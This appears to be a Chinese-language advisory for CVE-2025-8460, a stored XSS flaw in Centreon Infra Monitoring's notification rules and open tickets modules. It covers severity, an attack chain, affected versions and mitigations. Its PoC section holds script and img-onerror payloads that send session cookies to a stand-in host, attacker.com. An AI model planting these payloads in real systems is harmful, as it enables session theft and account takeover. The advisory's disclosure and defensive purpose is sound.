CVE-2025-8460 Centreon Infra Monitoring存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8460

漏洞类型

存储型XSS (Cross-site Scripting)

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring

漏洞概述

CVE-2025-8460是Centreon Infra Monitoring中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于通知规则(Notification rules)和开放工单模块(Open tickets module)中，源于Web页面生成期间对用户输入的不当中和处理。漏洞允许具有提升权限的用户在系统中注入恶意脚本代码，由于是存储型XSS，恶意代码会被永久保存在服务器端，所有访问受影响页面的用户都会受到攻击。攻击者可利用此漏洞窃取会话Cookie、劫持用户账户、进行钓鱼攻击或在内网中进一步渗透。该漏洞的CVSS评分为6.8，属于中等严重程度，攻击向量为网络方式，无需用户交互，但需要高权限用户参与。机密性影响为高，完整性和可用性暂无影响。Centreon是一款广泛使用的开源基础设施监控软件，该漏洞影响了其多个长期支持版本。

技术细节

该漏洞属于CWE-79（Web页面生成时对输入的不当中和），也称为存储型跨站脚本漏洞。在Centreon Infra Monitoring的通知规则和开放工单模块中，系统未能对用户提交的输入进行充分的HTML特殊字符转义处理。攻击者（需要高权限）可以在通知规则配置或工单创建过程中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>等Payload。由于这些输入被存储在数据库中并在后续页面访问时直接回显到HTML响应中，任何访问相关功能页面的用户都会执行该恶意脚本。攻击者通常利用此漏洞窃取受害者的认证会话令牌，进而完成账户劫持。在Centreon的架构中，Notification rules和Open tickets模块涉及多用户协作场景，增加了漏洞的潜在影响范围。修复版本分别为24.10.5、24.04.5和23.10.4。

攻击链分析

STEP 1

步骤1

攻击者获取Centreon系统的高权限账户（如管理员或具有通知规则配置权限的用户）

STEP 2

步骤2

攻击者访问Infra Monitoring模块中的Notification rules或Open tickets功能

STEP 3

步骤3

在规则名称、描述或工单内容等输入字段中注入恶意JavaScript代码（如<script>标签或事件处理器）

STEP 4

步骤4

恶意Payload被保存到数据库中，由于系统未进行充分输入验证和输出编码

STEP 5

步骤5

当其他用户访问受影响的功能页面时，存储的恶意脚本被浏览器解析执行

STEP 6

步骤6

攻击者通过恶意脚本窃取受害者的会话Cookie、劫持账户或进行进一步内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2025-8460 Stored XSS PoC - Centreon Infra Monitoring */
/* Target: Notification rules or Open tickets module */

// PoC for Stored XSS in Centreon Infra Monitoring
// Requires high privileges (PR:H)

const payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Method 1: Via Notification Rules
const notificationRulePayload = {
    name: 'Malicious Notification Rule',
    alias: 'xss-' + Date.now(),
    description: payload,
    type: 'notification',
    command: 'notify-service',
    contact: 'admin',
    period: '24x7'
};

// Method 2: Via Open Tickets Module
const ticketPayload = {
    subject: 'Issue Report',
    description: '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">',
    ticket_id: 'TKT-' + Math.random().toString(36).substr(2, 9),
    status: 'open',
    priority: 'high'
};

// Exploitation: When other users view the affected page,
// the stored JavaScript will execute in their browser context,
// potentially stealing session cookies or performing actions on behalf of the victim.

console.log('CVE-2025-8460 Stored XSS PoC');
console.log('Payload:', payload);
console.log('Target: Centreon Infra Monitoring < 24.10.5, < 24.04.5, < 23.10.4');

影响范围

Centreon Infra Monitoring 24.10.0 - 24.10.4

Centreon Infra Monitoring 24.04.0 - 24.04.4

Centreon Infra Monitoring 23.10.0 - 23.10.3

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制Notification rules和Open tickets模块的访问权限，仅允许绝对必要的用户访问；2) 在Web应用防火墙(WAF)层面配置XSS防护规则，拦截包含<script>标签和事件处理器属性的请求；3) 实施严格的输入验证，禁止在通知规则和工单字段中使用HTML标签；4) 启用HttpOnly和Secure标志保护Cookie，防止JavaScript访问；5) 对受影响模块实施额外的安全监控和日志审计；6) 考虑临时禁用非必要用户对通知规则配置功能的访问。